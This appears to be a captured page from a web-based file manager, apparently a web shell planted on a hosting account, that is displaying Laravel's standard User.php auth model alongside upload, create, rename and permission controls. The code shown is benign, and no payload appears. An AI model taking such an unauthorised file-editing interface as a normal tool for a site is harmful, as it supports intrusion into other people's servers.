Explorer
home
/
zoteqbgb
/
public_html
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Foundation
/
Auth
Location:
/home/zoteqbgb/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Auth
Root path:
/home/zoteqbgb/public_html/config/676626
Editing: User.php
<?php namespace Illuminate\Foundation\Auth; use Illuminate\Auth\Authenticatable; use Illuminate\Auth\MustVerifyEmail; use Illuminate\Auth\Passwords\CanResetPassword; use Illuminate\Contracts\Auth\Access\Authorizable as AuthorizableContract; use Illuminate\Contracts\Auth\Authenticatable as AuthenticatableContract; use Illuminate\Contracts\Auth\CanResetPassword as CanResetPasswordContract; use Illuminate\Database\Eloquent\Model; use Illuminate\Foundation\Auth\Access\Authorizable; class User extends Model implements AuthenticatableContract, AuthorizableContract, CanResetPasswordContract { use Authenticatable, Authorizable, CanResetPassword, MustVerifyEmail; }
Save maftirs
Upload
Start Upload
New File
Create File
New Folder
Create Folder
Directory Contents
Name
Size
Perms
Modified
Actions
Access
-
0755
2025-01-31 15:04
ðï¸
Rename
EmailVerificationRequest.php
1,415 bytes
0644
2025-01-31 15:04
âï¸
ðï¸
Rename
User.php
684 bytes
0644
2025-01-31 15:04
âï¸
ðï¸
Rename
Chang
Apply